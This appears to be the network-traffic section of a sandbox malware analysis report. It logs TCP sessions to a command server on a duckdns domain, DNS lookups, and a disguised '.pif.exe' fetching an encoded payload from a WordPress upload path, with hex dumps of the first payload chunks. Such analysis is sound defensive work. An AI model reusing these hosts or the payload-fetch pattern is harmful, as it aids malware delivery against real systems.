                                                        Jan 9, 2025 19:04:29.670186996 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:29.670275927 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:29.675371885 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:30.088726044 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:30.133280993 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:30.347747087 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:30.398943901 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:30.417948961 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:30.422908068 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:30.423006058 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:30.427859068 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:35.728189945 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:35.733236074 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:35.733298063 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:35.738033056 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:35.978885889 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:36.023955107 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:36.162959099 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:36.166594982 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:36.171457052 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:36.171555996 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:36.176645994 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.118216038 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:38.123083115 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.123159885 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:38.127912998 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.531892061 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.586481094 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:38.709419012 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.713624954 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:38.722095013 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:38.722217083 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:38.727086067 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:40.556859016 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:40.561850071 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:40.562139988 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:40.566968918 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:40.979290009 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.023982048 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.163296938 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.167701006 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.174443007 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.174526930 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.180006027 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.493243933 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.498239040 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.498326063 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.503235102 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.776916981 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.820852995 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.959918022 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.963076115 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.967916965 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:41.967963934 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:41.972718000 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.196880102 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:42.202004910 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.202076912 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:42.206963062 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.572006941 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.617826939 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:42.839521885 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.842210054 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:42.847095013 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:04:42.847156048 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:04:42.851914883 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:03.965675116 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:03.972548962 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:03.972637892 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:03.979357958 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:04.385849953 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:04.430391073 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:04.569606066 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:04.573157072 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:04.578078985 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:04.578174114 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:04.583091974 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:21.634356976 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:21.639373064 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:21.639436007 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:21.644231081 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:22.056797981 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:22.102355003 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:22.241904974 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:22.244584084 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:22.249434948 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:22.249489069 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:22.254313946 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:40.603195906 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:40.609299898 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:40.609353065 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:40.614135027 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:41.025582075 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:41.071186066 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:41.341111898 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:41.344783068 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:41.350653887 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:41.350711107 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:41.355504990 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:43.618534088 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:43.623435974 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:43.624093056 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:43.628936052 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:44.049093962 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:44.102459908 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:44.226994038 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:44.230349064 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:44.235399961 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:44.235466003 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:44.240331888 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:56.993742943 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:56.998755932 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:56.998811007 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:57.004046917 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:57.407341003 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:57.461894035 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:57.642136097 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:57.645221949 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:57.650068998 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:05:57.652107954 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:05:57.656871080 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:13.649416924 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:13.654405117 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:13.654577971 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:13.659382105 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:14.099289894 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:14.152144909 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:14.300597906 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:14.302064896 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:14.308208942 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:14.308348894 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:14.313139915 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:39.650955915 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:39.655862093 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:39.655925989 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:39.660697937 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:40.073949099 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:40.118371964 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:40.280812025 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:40.282165051 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:40.286998987 CET5078749707193.187.91.218192.168.2.8
                                                        Jan 9, 2025 19:06:40.287055016 CET4970750787192.168.2.8193.187.91.218
                                                        Jan 9, 2025 19:06:40.292025089 CET5078749707193.187.91.218192.168.2.8

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 9, 2025 19:02:06.780510902 CET6134553192.168.2.81.1.1.1
                                                        Jan 9, 2025 19:02:07.589133024 CET53613451.1.1.1192.168.2.8
                                                        Jan 9, 2025 19:02:17.256433010 CET6326753192.168.2.81.1.1.1
                                                        Jan 9, 2025 19:02:17.359329939 CET53632671.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 9, 2025 19:02:06.780510902 CET192.168.2.81.1.1.10x4408Standard query (0)www.chirreeirl.comA (IP address)IN (0x0001)false
                                                        Jan 9, 2025 19:02:17.256433010 CET192.168.2.81.1.1.10x62cdStandard query (0)pureeratee.duckdns.orgA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 9, 2025 19:02:07.589133024 CET1.1.1.1192.168.2.80x4408No error (0)www.chirreeirl.comchirreeirl.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 9, 2025 19:02:07.589133024 CET1.1.1.1192.168.2.80x4408No error (0)chirreeirl.com209.58.149.225A (IP address)IN (0x0001)false
                                                        Jan 9, 2025 19:02:17.359329939 CET1.1.1.1192.168.2.80x62cdNo error (0)pureeratee.duckdns.org193.187.91.218A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.chirreeirl.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849706209.58.149.2254437544C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-09 18:02:08 UTC98OUTGET /wp-panel/uploads/Mqdwogssw.vdf HTTP/1.1
                                                        Host: www.chirreeirl.com
                                                        Connection: Keep-Alive
                                                        2025-01-09 18:02:08 UTC184INHTTP/1.1 200 OK
                                                        Date: Thu, 09 Jan 2025 18:02:08 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 30 Dec 2024 00:09:57 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1298440
                                                        Connection: close
                                                        2025-01-09 18:02:08 UTC8008INData Raw: d7 61 6f 83 ad 0d ad 9e 98 50 87 af 1c 92 e1 fe 11 fd bc 5f 75 76 e9 f4 df f4 8b 95 89 8e 9c 29 21 c0 18 5b c0 94 8f 20 bf 0d 9b 0c 33 8c cb 87 31 48 62 e0 b0 00 39 67 a4 6d fb 97 2b f9 2f 77 6a 93 4a 6b 7a e0 f2 44 11 47 16 a4 17 cd 03 3b 46 b2 3e 11 b5 93 e5 1f b3 9d 72 6d a6 65 33 b9 04 a3 0f 31 d0 f1 dd c0 d1 21 fb ed f4 69 0a 57 47 e6 4e 58 ef 1a 60 fc 07 ed 69 ab 58 29 dc 40 9f 45 f5 a7 94 4f 41 02 9a 14 2d 7b 40 0d 74 87 a1 0a d1 ee 96 c5 0c 01 2d 4b f3 55 c1 7e e5 1c 81 c6 f2 04 9a 7b b2 e9 67 9b af e6 11 06 3d 35 51 d0 52 c0 42 5c d3 87 e8 1c 40 d6 01 70 8d 6b 7b 1b 09 22 b2 a5 13 ef 58 93 a9 94 49 c7 d5 ac 33 f1 c1 29 05 18 33 1f ee 4f 7d 6e 44 81 d3 c7 00 a0 47 93 89 86 41 01 aa 43 75 4c fe 99 87 bf 27 09 8e a5 86 35 7a 7d 21 b9 0b 74 2d db 7f
                                                        Data Ascii: aoP_uv)![ 31Hb9gm+/wjJkzDG;F>rme31!iWGNX`iX)@EOA-{@t-KU~{g=5QRB\@pk{"XI3)3O}nDGACuL'5z}!t-
                                                        2025-01-09 18:02:08 UTC8000INData Raw: 70 cd 51 5d 71 10 14 8f 1a 32 70 c6 ee fa d4 43 04 a7 1f 4b ad f6 70 78 b7 fa fd 10 ad 96 8e de 43 82 5f aa b8 e2 3b 4e c0 60 d3 6a 0a af 51 b7 ce be b7 ac 6f b7 e3 1b de b0 0b d0 d9 d9 b7 e1 ad ec 85 fc 48 99 14 e7 56 35 8a 58 26 d8 eb 71 08 40 7a f1 df ce 1f 6f 29 4f cc 8c 24 20 16 c1 ef 57 c8 21 7d 91 85 cb f0 f0 58 48 67 85 6b 2c 77 42 cc 09 57 db 69 ed 77 a8 10 fc a8 9d 43 45 b6 23 e7 22 39 0d 99 34 e4 69 5a f2 78 bc f4 e3 b0 3e b9 fd d8 44 c0 a5 2b 14 63 0c f6 4e 00 58 25 64 6d 8e 87 91 d9 4f aa 6b 7e de 3d 04 8b b3 1a b0 e7 9a 94 24 bd 8a 7b 05 46 e6 f3 f1 87 93 92 0f fb c5 ed 2b 83 8b e4 ae a8 fe bb 4d e8 de ab 10 c6 b2 f9 47 cc 66 cb 0a ba dd 6b a4 0c 02 e8 86 10 76 93 0a 88 36 0e ce 44 09 9c ea bf 17 90 98 ee d1 03 83 65 93 02 24 8e d2 0b 6f ab
                                                        Data Ascii: pQ]q2pCKpxC_;N`jQoHV5X&q@zo)O$ W!}XHgk,wBWiwCE#"94iZx>D+cNX%dmOk~=${F+MGfkv6De$o
                                                        2025-01-09 18:02:08 UTC8000INData Raw: 22 6a 38 40 ab 4b 0b 08 9a ed 94 ad 7f d3 b4 2e 2e 1e 03 72 42 e2 25 73 a9 4c b6 47 13 80 79 ac 9c a1 8c ff ec 40 a5 32 64 f3 ab 14 59 ef 24 a6 10 b3 67 35 78 91 21 b7 f4 62 2c 26 db 31 f4 a5 30 61 96 a6 ee 79 2a 9c f4 27 ac b0 0f 9e 6f 79 11 d4 ee 2f 32 7e e0 ef fe 8e d6 7b 9e fe 77 8b b2 42 4c 0a d1 b7 e2 95 63 01 fb 42 45 c0 5f fc 7d 7b a2 d9 64 cd 51 e2 f4 5d d8 d2 cb f8 79 4d c6 67 09 89 a1 1e 3e 3b a5 80 fd 73 11 68 3c 04 28 30 14 1b f7 90 ab 38 2e b4 41 b9 10 71 e8 d5 bd 84 ea a5 2f 32 21 93 9c ad 25 68 80 ff 43 54 9e 1f cc a6 09 88 5d 93 db 97 f0 92 e4 a7 12 58 6f 0b ef e5 a1 25 d6 de c7 d3 d9 05 70 45 19 dc 0a 37 b8 a8 93 40 8e 07 60 63 c6 23 a7 dd 98 df a0 1a e4 89 6b 38 3e d2 9c a5 7c 0f 89 a6 a5 b4 f6 9f 5f 83 1c f0 e9 bb 64 84 56 02 fc 99 00
                                                        Data Ascii: "j8@K..rB%sLGy@2dY$g5x!b,&10ay*'oy/2~{wBLcBE_}{dQ]yMg>;sh<(08.Aq/2!%hCT]Xo%pE7@`c#k8>|_dV
                                                        2025-01-09 18:02:08 UTC8000INData Raw: ad 18 ff e7 be 04 fd 7c 9c d2 02 7d 1d 69 dd 63 68 d7 7d 51 37 4e 46 8e d0 9a 43 3f c1 14 3f 33 f4 9a a0 8a 5a 7e c8 9b e6 8a 4f ea 8f 42 0d 54 ff ce 90 29 af b0 5b dd f6 79 f2 e4 74 f9 b2 0f 78 3e ec 92 1c 3d 0c 35 f0 e3 8f 61 ef 20 29 66 e8 a2 4f 68 9e 69 92 02 d6 a2 7e 11 05 98 94 42 a0 95 14 09 f7 00 28 04 06 10 40 b3 6a 61 e9 c7 d8 a8 15 d2 71 ee ae b8 9c 2f eb 5f b3 7d e0 b8 19 cf 77 cb 67 bf 3f ea 5b 57 5d ac a8 13 8b 24 66 8e 4e e1 89 73 1d 79 e4 c4 20 64 3c c9 4f dc 96 c6 38 c5 a3 e4 ee ac 22 fe 55 05 6a 6d 4b 84 0a ef 7b a3 9b ef fd d0 80 d4 c0 91 cd 7a 04 33 25 3c 48 24 e3 f0 4e 62 55 73 ca 23 88 8b 6d 63 ae fc 5d 5f c6 43 0d 1d 39 8e 45 c1 e9 e3 e7 96 f5 ca f7 a1 e7 ff 80 ca 5e 91 d8 53 0a bb e7 04 11 82 0c 5f 7b c1 57 dc d0 65 ba f5 f3 03 d7
                                                        Data Ascii: |}ich}Q7NFC??3Z~OBT)[ytx>=5a )fOhi~B(@jaq/_}wg?[W]$fNsy d<O8"UjmK{z3%<H$NbUs#mc]_C9E^S_{We
                                                        2025-01-09 18:02:08 UTC8000INData Raw: 97 b3 b0 74 11 25 82 77 64 83 1f 20 87 50 bd 7b 99 13 d8 af 07 28 02 37 fe 64 c8 75 16 9d ec 12 9f e6 0a 13 8e dd 43 c7 63 41 67 7a 30 21 f0 84 0f dd ad 4c 30 5a a5 96 cc c9 c7 29 4e 45 02 45 d7 05 3f 78 5d f7 a4 2f 5d 5d d0 34 c5 e5 3a d4 d6 30 ae ec 21 f4 77 c2 15 3d a8 49 b4 0b 2f a4 41 92 5b 27 7a 68 82 45 f3 41 75 62 e6 30 81 e7 3b a4 5e 46 1a 7d 20 b7 22 29 93 3c d7 ce 62 49 cf 64 20 8e d9 50 32 6c 29 4d cc df 32 72 25 0f 12 87 78 a3 59 21 02 e2 6f 0f e3 c2 19 63 ec 9a e5 3a 03 88 28 25 d8 0e 0f 30 10 10 96 f9 a1 f1 0c e9 e8 8b a6 36 c1 de 99 1c b5 0a 6d 2a ba 3b d4 26 e4 24 5f 4b ed 1e 12 a4 ca b7 11 02 fd 42 e2 4c 76 09 a6 df 48 5c 7d 4a c8 a1 9c 02 53 ad 4f 2a 8d 3d c8 a0 f9 5a 7f 9f 5b c2 ec 54 4b 11 f9 d9 95 15 2e ec 0f 9b f7 0f 8e 7f c5 f5 ae
                                                        Data Ascii: t%wd P{(7duCcAgz0!L0Z)NEE?x]/]]4:0!w=I/A['zhEAub0;^F} ")<bId P2l)M2r%xY!oc:(%06m*;&$_KBLvH\}JSO*=Z[TK.
                                                        2025-01-09 18:02:08 UTC8000INData Raw: 8e 3b 82 ed 35 6c de e5 75 ea 1d 4b 1c b5 32 a8 21 d8 0a ed 61 f2 79 a6 64 f8 3c 63 7e 6d 41 7b a0 6e 23 a3 18 97 20 9b 23 0c 23 00 e2 4c 4d b7 cd 9a d8 88 55 fc 88 17 17 9b 5c dc f4 c4 bf f3 9f 47 31 32 59 ac 18 d7 79 76 a5 92 03 48 bd cb 76 42 54 b7 20 9f f0 d5 dc 42 19 16 85 f9 35 d4 95 23 6d c4 dc 8b ab d9 25 46 b4 8d 64 33 83 16 9d 3d 71 2f 6b 61 66 0c 4a 49 d4 35 16 09 80 f9 99 66 07 fe 03 27 82 22 24 ee ad b0 e3 53 81 9a c6 ad 4d 10 d3 df 9b 5a 77 39 d7 21 e1 79 e6 32 2b 5e d7 c0 2c 94 af 78 5f 5d 06 84 ef 64 eb da e9 e3 51 90 19 a5 fb bd b9 6e a1 aa f9 b0 af 45 0d a5 07 4c 83 b1 da 89 a6 89 ed 26 3c be 3c e9 65 45 8d ae 62 48 0b 4e 8a e4 41 07 05 e1 8e 56 07 7c af e9 f4 03 58 fe 3f f0 be d1 89 b7 c4 d3 16 b9 1f 35 45 c0 c5 1c c0 c7 ed c8 d0 71 59
                                                        Data Ascii: ;5luK2!ayd<c~mA{n# ##LMU\G12YyvHvBT B5#m%Fd3=q/kafJI5f'"$SMZw9!y2+^,x_]dQnEL&<<eEbHNAV|X?5EqY
                                                        2025-01-09 18:02:08 UTC8000INData Raw: e9 df 82 b2 59 d9 a6 6a 02 7a 53 4a 66 87 2a b5 f4 4a d7 de f7 1b 9f f7 43 5d 8b 9f 78 bf 9b e1 fd 22 8b 28 51 ec 18 93 30 a4 2d 12 0b 3d d3 ec a0 94 70 a6 dc 97 f9 52 20 ff 89 9d f6 f4 7b c2 38 89 51 c6 4d 92 f0 c6 b3 a4 35 b3 e8 13 6d 31 12 37 87 96 a6 b5 05 48 0e eb b4 1c bd 46 d0 c4 fc 81 91 a5 69 87 57 83 1c 05 bf 86 01 d4 ce 5d a9 d5 a8 20 20 41 dc 6f 8b 38 9f 66 8c d3 61 01 8e 2f 9c 63 28 0e 26 19 f9 85 63 dc a0 f1 e7 53 96 25 22 97 6f 90 34 47 97 6b 64 ed b4 35 01 55 99 c8 f6 47 3e 83 6b 39 15 c9 03 aa de 82 b3 eb f4 fe 8a 89 4a 01 56 06 50 88 52 9d df 5c ea 31 89 e6 fe 6e 5f 5f 78 87 bf 86 fd 84 a0 97 69 53 88 70 d6 b8 ff fd 4a 16 95 9d 89 85 95 48 2c b7 f3 b8 13 3b 26 50 c6 86 b7 b2 58 e3 aa 22 05 4a 00 80 8c 73 d6 3e 16 ac 40 75 65 b4 51 e7 59
                                                        Data Ascii: YjzSJf*JC]x"(Q0-=pR {8QM5m17HFiW] Ao8fa/c(&cS%"o4Gkd5UG>k9JVPR\1n__xiSpJH,;&PX"Js>@ueQY
                                                        2025-01-09 18:02:08 UTC8000INData Raw: c7 e6 66 55 05 4f b3 0e 16 93 35 72 09 29 73 b3 f5 09 d4 82 3f 98 73 56 5a 2a 8a 55 d7 a5 b0 6b 5d 92 1f fe 7a ae 7b fc 25 bf 3b bd e4 00 2c 53 40 a2 8d 91 30 c9 cd 41 f8 96 bf 9e 85 2e c2 a0 e8 0f c6 da 8d c3 7c 35 f8 27 c2 2c a6 85 08 ed fa 22 5a 63 98 d6 35 ce d7 36 68 01 9d 94 97 63 ef 4e 19 96 4e 8f 22 ed 77 8f eb 3a 70 e8 a7 31 52 da e9 50 dc 2e 48 64 e6 c7 3a a0 e6 3c f7 e8 62 f0 d6 ea 0c 02 4e 6e 11 d3 93 4d 15 dc 49 15 9a e6 27 6f b6 13 a5 42 6b c5 c8 ab a9 20 f4 90 92 75 08 83 c9 27 e1 ef 9c a6 92 6e 6c 12 e6 02 a3 f1 bb d6 79 3d fe 61 3c c5 27 bc c7 40 3b f0 7d ac dd 0a e0 68 f9 5b 48 1e 51 6c 5e bc a3 fa 03 f9 c5 90 eb 11 e7 3a cc e9 3d 16 0e 56 64 b6 25 56 19 a2 59 26 2d 89 02 35 c1 27 15 f0 e5 a8 91 ab f2 0d ea 27 19 b3 aa 3b 57 e4 93 22 8d
                                                        Data Ascii: fUO5r)s?sVZ*Uk]z{%;,S@0A.|5',"Zc56hcNN"w:p1RP.Hd:<bNnMI'oBk u'nly=a<'@;}h[HQl^:=Vd%VY&-5'';W"
                                                        2025-01-09 18:02:08 UTC8000INData Raw: 2a ae d6 eb a8 64 80 9f 1b ec ea c5 0b ee e2 16 2e 7f be 8a 92 a8 85 86 31 f1 01 23 0b 04 b2 fb 4e 27 25 8e 64 10 34 b9 f3 ae 5b 68 39 2c 8f 3c 82 43 c1 64 ac 23 e2 08 6e 54 e4 c2 21 8f 4f 2a f1 bf bd 35 f8 8d 15 ed 01 23 fa 17 86 ce 96 c2 dd f7 c1 85 cf 39 95 88 b3 19 4c 62 06 e0 b0 cc d5 78 72 bb 79 14 7a 53 5c 92 a6 bc 31 c2 da fe 3d 13 46 92 f2 44 f5 76 4c 76 c1 3a cd de 3c e5 ee e0 a5 aa db ce d6 4c 3f 1a 70 b7 eb fe 2e b8 8b 3f 7f 17 32 4f b6 61 7b 7d 3b 05 71 a7 d8 d8 11 60 ad b0 4f 00 d2 1e ce 6b 7f d5 ca f8 f8 eb 6d de c0 a9 1f fa 7a 69 c5 ba c1 8a db 54 83 18 55 6b 3a d3 39 51 88 de 32 73 c2 7d 45 cc 89 3d bd 1a 95 4f 88 27 74 25 1d fa 66 ce 90 77 4d 44 5b 4e 3b d5 68 21 6c 14 6d a2 94 9e 69 f3 25 56 4e 37 c1 ab 20 33 6a 2f f5 ac 11 7e 88 5c 55
                                                        Data Ascii: *d.1#N'%d4[h9,<Cd#nT!O*5#9LbxryzS\1=FDvLv:<L?p.?2Oa{};q`OkmziTUk:9Q2s}E=O't%fwMD[N;h!lmi%VN7 3j/~\U
